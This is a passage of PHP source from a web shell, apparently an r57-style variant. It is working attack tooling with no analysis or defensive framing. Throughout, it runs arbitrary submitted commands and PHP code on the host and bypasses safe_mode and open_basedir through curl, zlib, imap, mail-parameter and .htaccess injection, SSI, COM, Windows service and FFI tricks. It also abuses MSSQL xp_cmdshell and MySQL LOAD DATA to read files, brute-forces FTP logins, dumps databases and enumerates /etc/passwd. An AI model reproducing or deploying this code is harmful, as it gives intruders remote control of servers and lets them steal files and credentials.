echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td class=main><b><div align=center><textarea name=report cols=121 rows=15 spellcheck='false'>";
function dozip1($link,$file)
{
$fp = @fopen($link,"r");
while(!feof($fp))
{
$cont.= fread($fp,1024);
}
fclose($fp);
$fp2 = @fopen($file,"w");
fwrite($fp2,$cont);
fclose($fp2);
}
if (isset($_POST['funzip']))
{
dozip1($_POST['funzip'],$_POST['fzip']);
}
if(empty($_POST['root'])){
} else {
$root = $_POST['root']; }
$c = 0; $D = array();
set_error_handler("eh");
$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
for($i=0; $i < strlen($chars); $i++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
$prevD = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD){
for($j=0; $j < strlen($chars); $j++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
$prevD2 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD2){
for($p=0; $p < strlen($chars); $p++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
$prevD3 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD3){
for($r=0; $r < strlen($chars); $r++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
glob($path."*");
}
}
}
}
}
}
}
$D = array_unique($D);
foreach($D as $item)
if(isset($_REQUEST['root']))
echo "{$item}\n";
function eh($errno, $errstr, $errfile, $errline){
global $D, $c, $i;
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
if($o){ $D[$c] = $o[2]; $c++;}
}
if($safe_mode)
{
switch($_POST['cmd'])
{
case 'safe_dir':
$d=@dir($dir);
if ($d)
{
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if(!$unix){
echo date("d.m.Y H:i",$mtime);
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
else echo $lang[$language._text29];
break;
case 'test1':
$ci = @curl_init("file://".$_POST['test1_file']."");
$cf = @curl_exec($ci);
echo $cf;
break;
case 'test2':
@include($_POST['test2_file']);
break;
case 'test4':
if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
if($db)
{
if(@mssql_select_db($_POST['test4_md'],$db))
{
@mssql_query("drop table r57_temp_table",$db);
@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
$res = mssql_query("select * from r57_temp_table",$db);
while(($row=@mssql_fetch_row($res)))
{
echo $row[0]."\r\n";
}
@mssql_query("drop table r57_temp_table",$db);
}
else echo "[-] ERROR! Can't select database";
@mssql_close($db);
}
else echo "[-] ERROR! Can't connect to MSSQL server";
break;
case 'test5':
if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
$extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
$lines = file ('/tmp/mb_send_mail');
foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
break;
case 'test6':
$stream = @imap_open('/etc/passwd', "", "");
$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
@imap_close($stream);
break;
case 'test7':
$stream = @imap_open($_POST['test7_file'], "", "");
$str = @imap_body($stream, 1);
echo $str;
@imap_close($stream);
break;
case 'test8':
if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
else echo $lang[$language.'_text119'];
break;
case 'cURL':
if(empty($_POST['SnIpEr_SA'])){
} else {
$curl=$_POST['SnIpEr_SA'];
$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
echo "</textarea></CENTER>";
}
break;
case 'copy':
if(empty($snn)){
if(empty($_GET['snn'])){
if(empty($_POST['snn'])){
} else {
$u1p=$_POST['snn'];
}
} else {
$u1p=$_GET['snn'];
}
}
$u1p=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$snn, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
echo "</textarea></CENTER>";
}
break;
case 'ini_restore':
if(empty($_POST['ini_restore'])){
} else {
$ini=$_POST['ini_restore'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
require_once("$ini");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
echo "</textarea></CENTER>";
}
break;
case 'glob':
function reg_glob()
{
$chemin=$_REQUEST['glob'];
$files = glob("$chemin*");
foreach ($files as $filename) {
echo "$filename\n";
}
}
if(isset($_REQUEST['glob']))
{
reg_glob();
}
break;
case 'zend':
if(empty($_POST['zend'])){
} else {
$dezend=$_POST['zend'];
include($_POST['zend']);
print_r($GLOBALS);
require_once("$dezend");
echo "</textarea></p>";
}
break;
case 'plugin':
if ($_POST['plugin'] ){
for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
echo "</textarea>";
}
break;
case 'command':
if (!empty($_POST['command'])) {
if ($method=="system") {
system($_POST['command']);
echo "Functions system";
}
if ($method=="passthru") {
passthru($_POST['command']);
echo "Functions passthru";
}
if ($method=="exec") {
$string = exec($_POST['command']);
echo $string;
echo "Functions exec";
}
if ($method=="shell_exec") {
$string = shell_exec($_POST['command']);
echo $string;
echo "Functions shell_exec";
}
if ($method=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
echo "Functions popen";
}
if ($method=="proc_open") {
$command = isset($_POST['command']) ? $_POST['command'] : '';
/* Load the configuration. */
/* Default settings --- these settings should always be set to something. */
/* Merge settings. */
session_start();
if (!empty($command)) {
/* Save the command for late use in the JavaScript. If the command is
* already in the history, then the old entry is removed before the
* new entry is put into the list at the front. */
if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_POST['command']);
/* Now append the commmand to the output. */
$_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";
/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['command'])) {
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} elseif (trim($_POST['command']) == 'exit') {
logout();
} else {
/* The command is not an internal command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);
// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . $rows);
putenv('COLUMNS=' . $columns);
}
/* Alias expansion. */
$length = strcspn($_POST['command'], " \t");
$token = substr($_POST['command'], 0, $length);
if (isset($ini['aliases'][$token]))
$command = $ini['aliases'][$token] . substr($_POST['command'], $length);
$io = array();
$p = proc_open($_POST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
}
}
break;
case 'test10':
@error_log($_POST['test10_content'], 3,"php://../../".$_POST['test10_file']);
break;
case 'test11':
if(file_exists("./result.txt") && file_exists("./.htaccess"))
{
@unlink("./.htaccess");
@unlink("./result.txt");
}
if ($handle = @fopen("./.htaccess", 'w')) { @fwrite($handle, "php_value mail.force_extra_parameters '-t && ".$_POST['test11_cmd']." > ".dirname($_SERVER["SCRIPT_FILENAME"])."/result.txt'"); mail("", "", ""); }
//while(!file_exists(dirname($_SERVER["SCRIPT_FILENAME"])."/result.txt")) sleep(1);
if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
break;
case 'test12':
if ($handle = @fopen("./.htaccess", 'w')) { @fwrite($handle, "AddType text/html .shtml\r\nAddHandler server-parsed .shtml\r\nOptions +Includes"); }
if ($handle = @fopen("./cmdssi.shtml", 'w')) { @fwrite($handle, '<!--#exec cmd="'.$_POST['test12_cmd'].'"-->'); }
// url_fopen ????? ???????? ??? ?????... ????? ?????? ????????? ??????
@include("http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/cmdssi.shtml");
break;
case 'test13':
$tmp = '';
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
@unlink($tmp.'/result_test13.txt');
$wscript = new COM('wscript.shell');
$wscript->Run('cmd.exe /c "'.$_POST['test13_cmd'].'" > '.$tmp.'/result_test13.txt');
while(!file_exists($tmp.'/result_test13.txt')) sleep(1);
$lines = @file ($tmp.'/result_test13.txt');
if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
@unlink($tmp.'/result_test13.txt');
break;
case 'test14':
$ioncube = @ioncube_read_file($_POST['test14_cmd']);
echo htmlspecialchars($ioncube);
break;
case 'test15':
$tmp = '';
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
@unlink($tmp.'/result_test15.txt');
@win_shell_execute("cmd.exe","","/c ".$_POST['test15_cmd']." > ".$tmp."/result_test15.txt");
while(!file_exists($tmp.'/result_test15.txt')) sleep(1);
$lines = @file ($tmp.'/result_test15.txt');
if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
@unlink($tmp.'/result_test15.txt');
break;
case 'test16':
$tmp = '';
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
$name=$tmp."\\".uniqid();
$n=uniqid();
$cmd=(empty($_SERVER['COMSPEC']))?'c:\\windows\\system32\\cmd.exe':$_SERVER['COMSPEC'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c ".$_POST['test16_cmd']." >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name)) sleep(1);
$exec=file_get_contents($name);
unlink($name);
echo htmlspecialchars($exec);
break;
case 'test17':
$_POST['test17_cmd'] = str_replace('\\','\\\\',$_POST['test17_cmd']);
$perl = new Perl();
$perl->eval('print `'.$_POST['test17_cmd'].'`');
break;
case 'test18':
if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
else break;
$name=$tmp."\\".uniqid();
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c ".$_POST['test18_cmd']." >\"$name\"",0);
while(!file_exists($name)) sleep(1);
$exec=file_get_contents($name);
unlink($name);
echo htmlspecialchars($exec);
break;
}
}
else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
$cmd_rep = ex($_POST['cmd']);
if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }}
if ($_POST['cmd']=="UnKn0wN_mysql")
{
if(empty($_POST['test3_sr'])) { $_POST['test3_sr'] = "localhost"; }
if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
$db = @mysql_connect($_POST['test3_sr'].':'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
if($db)
{
if(@mysql_select_db($_POST['test3_md'],$db))
{
@mysql_query("DROP TABLE IF EXISTS UnKn0wN");
@mysql_query("CREATE TABLE `UnKn0wN` ( `file` LONGBLOB NOT NULL )");
@mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['test3_file'])."\" INTO TABLE UnKn0wN FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
$r = @mysql_query("SELECT * FROM UnKn0wN");
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
@mysql_query("DROP TABLE IF EXISTS UnKn0wN");
}
else echo "[-] ERROR! Can't select database";
@mysql_close($db);
}
else echo "[-] ERROR! Can't connect to mysql server";
}
if ($_POST['cmd']=="ftp_brute")
{
$suc = 0;
foreach($users as $user)
{
$connection = @ftp_connect($ftp_server,$ftp_port,10);
if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
@ftp_close($connection);
}
echo "\r\n-------------------------------------\r\n";
$count = count($users);
if(isset($_POST['reverse'])) { $count *= 2; }
echo $lang[$language.'_text97'].$count."\r\n";
echo $lang[$language.'_text98'].$suc."\r\n";
}
if ($_POST['cmd']=="php_eval"){
$eval = @str_replace("<?","",$_POST['php_eval']);
$eval = @str_replace("?>","",$eval);
eval($eval);}
if ($_POST['cmd']=="mysql_dump")
{
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
else {
if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
else { echo "[-] ERROR! Can't write in dump file"; }
}
}
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
function div_title($title, $id)
{
return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
}
function div($id)
{
if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
return '<div id="'.$id.'">';
}
if(!$safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
else{
echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text208'],'id15').$table_up2.div('id15').$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select name=\"method\">
<option value=\"system\" <? if ($method==\"system\") { echo \"selected\"; } ?>system</option>
<option value=\"passthru\" <? if ($method==\"passthru\") { echo \"selected\"; } ?>passthru</option>
<option value=\"exec\" <? if ($method==\"exec\") { echo \"selected\"; } ?>exec</option>
<option value=\"shell_exec\" <? if ($method==\"shell_exec\") { echo \"selected\"; } ?>shell_exec</option>
<option value=\"popen\" <? if ($method==\"popen\") { echo \"selected\"; } ?>popen</option>
<option value=\"proc_open\" <? if ($method==\"proc_open\") { echo \"selected\"; } ?>proc_open</option>
</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text3'].$arrow."</b>".in('text','command',54,(!empty($_POST['command'])?($_POST['command']):("id"))).in('hidden','cmd',0,'command').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id411').$table_up2.div('id411').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id511').$table_up2.div('id511').$ts;
echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
echo $te.'</div>'.$table_end1.$fe;
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id204').$table_up2.div('id204').$ts;
echo sr(15,"<b>".$lang[$language.'_text226'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):('../../file.php'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10'));
echo sr(15,"<b>".$lang[$language.'_text227'].$arrow."</b>",in('text','test10_content',96,(!empty($_POST['test10_content'])?($_POST['test10_content']):('<? echo \'gotcha\'; ?>'))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text225'],'id225').$table_up2.div('id225').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test11_cmd',96,(!empty($_POST['test11_cmd'])?($_POST['test11_cmd']):('ls -la'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text228'],'id228').$table_up2.div('id228').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test12_cmd',96,(!empty($_POST['test12_cmd'])?($_POST['test12_cmd']):('ls -la'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&!$unix)
{
echo $fs.$table_up1.div_title($lang[$language.'_text229'],'id229').$table_up2.div('id229').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test13_cmd',96,(!empty($_POST['test13_cmd'])?($_POST['test13_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&extension_loaded("ionCube Loader"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text230'],'id230').$table_up2.div('id230').$ts;
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test14_cmd',96,(!empty($_POST['test14_cmd'])?($_POST['test14_cmd']):('../../boot.ini'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&!$unix&&extension_loaded("win32std"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text231'],'id231').$table_up2.div('id231').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test15_cmd',96,(!empty($_POST['test15_cmd'])?($_POST['test15_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&!$unix&&extension_loaded("win32service"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text232'],'id232').$table_up2.div('id232').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test16_cmd',96,(!empty($_POST['test16_cmd'])?($_POST['test16_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&extension_loaded("perl"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text131'],'id34').$table_up2.div('id233').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test17_cmd',96,(!empty($_POST['test17_cmd'])?($_POST['test17_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode&&!$unix&&extension_loaded("ffi"))
{
echo $fs.$table_up1.div_title($lang[$language.'_text132'],'id35').$table_up2.div('id234').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test18_cmd',96,(!empty($_POST['test18_cmd'])?($_POST['test18_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18').in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id207').$table_up2.div('id207').$ts;
echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id209').$table_up2.div('id209').$ts;
echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
echo $te.'</div>'.$table_end1.$fe;
echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id210').$table_up2.div('id210').$ts;
echo "<table class=table1 width=100% align=center>";
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
echo $te.'</div>'.$table_end1.$fe;
echo $table_up1.div_title($lang[$language.'_text211'],'id211').$table_up2.div('id211').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
echo $te.'</div>'.$table_end1.$fe;
$aliases2 = '';
foreach ($aliases as $alias_name=>$alias_cmd)
{
$aliases2 .= "<option>$alias_name</option>";
}
echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
echo $te.'</div>'.$table_end1.$fe;
}
if($safe_mode && $unix){
echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
echo $te.'</div>'.$table_end1.$fe;
